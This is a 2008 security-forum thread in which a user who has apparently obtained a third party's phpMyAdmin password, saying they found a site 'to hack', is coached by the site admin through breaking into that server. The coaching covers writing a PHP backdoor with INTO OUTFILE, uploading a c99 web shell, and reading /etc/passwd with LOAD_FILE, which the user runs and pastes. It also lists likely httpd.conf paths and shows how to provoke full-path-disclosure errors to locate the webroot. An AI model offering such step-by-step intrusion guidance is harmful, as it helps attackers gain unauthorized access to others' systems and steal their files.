|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 81
Members: 0
Total: 81
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How i can Download is files ? |
|
Posted: Thu Apr 10, 2008 9:41 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
I Found a site to hack and...
I found the password to enter in is phpmyadmin, i got all is database information, and structure.
Now i want to know if it exist a way to grab all is php and html files ?
the version of phpmyadmin is phpMyAdmin 2.5.4
and the version of mysql is MySQL 4.1.11-Debian_4sarge8-log
thank for your help ! |
|
|
|
|
Posted: Thu Apr 10, 2008 10:02 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
if you have FILE privelages then you can access files. |
|
|
|
|
Posted: Thu Apr 10, 2008 10:04 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
how with phpmyadmin i can browse files ? |
|
|
|
|
Posted: Thu Apr 10, 2008 10:06 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you have access to "mysql.user" table, then you have FILE privileges or you can delegate them to any other mysql user. And as gibbocool allready said, FILE privileges in mysql means ability to read and write files in database server. You can't "browse" files directly with phpmyadmin though
Use "INTO OUTFILE" for writing php backdoor and then use php functions for browsing the filesystem. Or upload php shell (c99?) and make use of it. |
|
Last edited by waraxe on Thu Apr 10, 2008 10:09 am; edited 1 time in total |
|
|
|
Posted: Thu Apr 10, 2008 10:08 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Apr 10, 2008 10:19 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
clubreseau wrote: | ok i use any program to enter i use www.site.com/phpmyadmin
can you tell me if i need a progrma to browse files |
Do you have php basic knowledge? Do you know "INTO OUTFILE" sql query? You need some knowledge before you can go further |
|
|
|
|
Posted: Thu Apr 10, 2008 10:24 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
my problem is the language im french
ok i browse file in phpmyadmin no problem.
now what i have to do ?
thank |
|
|
|
|
Posted: Thu Apr 10, 2008 10:39 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
i try
LOAD DATA INFILE
and
SELECT * INTO OUTFILE
can you explain please how it work this |
|
|
|
|
Posted: Thu Apr 10, 2008 10:40 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this in phpmyadmin:
go to "Run SQL query/queries on database", where you can enter arbitrary sql queries.
And execute this query:
SELECT LOAD_FILE('/etc/passwd')
Let me know about results |
|
|
|
|
Posted: Thu Apr 10, 2008 10:44 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
wow i see
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemo... |
|
|
|
|
Posted: Thu Apr 10, 2008 10:49 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Now ... probably you can read the files you wanted (php and html files). But you need to know FULL PATH to any file you want to access. So you need to exploit some full path dislcosure or you can try to guess full path via trial/error. Look at "/etc/passwd" file - do you see there username, which can be associated with your target? If so, then you should see there home directory too. |
|
|
|
|
Posted: Thu Apr 10, 2008 10:55 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
SELECT LOAD_FILE('/etc/passwd')
i got this
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh
[ edited by waraxe - no sensitive private info ! ] |
|
|
|
|
Posted: Thu Apr 10, 2008 11:01 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
i dont know where is the directory to get is index page of this site.
i try
SELECT LOAD_FILE('index.php');
SELECT LOAD_FILE('../index.php');
SELECT LOAD_FILE('/var/www/index.php');
no one work |
|
|
|
|
Posted: Thu Apr 10, 2008 11:22 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
someone can give me some tips ? how to find the path dir of is files ? |
|
|
|
|
|
|
|
|
Posted: Thu Apr 10, 2008 1:56 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You need to do some research about target.
Try this: SELECT LOAD_FILE('/proc/version')
Next question - is the target webserver Apache? Apache 2? 2.2?
From etc/passwd file target server seems to be dedicated webserver, not shared virtual hosting provider. So i suggest to search for "httpd.conf" file. From this Apache config file you can find out all about webroot(s) dirs.
Usually Apache config file is located in:
$APACHE_HOME/conf/httpd.conf
So if you can get this environment variable, then you probably will find httpd.conf file too.
Some possible locations:
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
usr/local/apache2.2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/etc/apache/httpd.conf
More ideas:
http://wiki.apache.org/httpd/DistrosDefaultLayout
There is one more solution - full path disclosure security issues.
Try to provoke (php) error messages in target.
If you can see something like:
Code: |
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/someuser/public_html/somedir/somefile.html on line 221
|
... then you have all the full path info you wanted |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|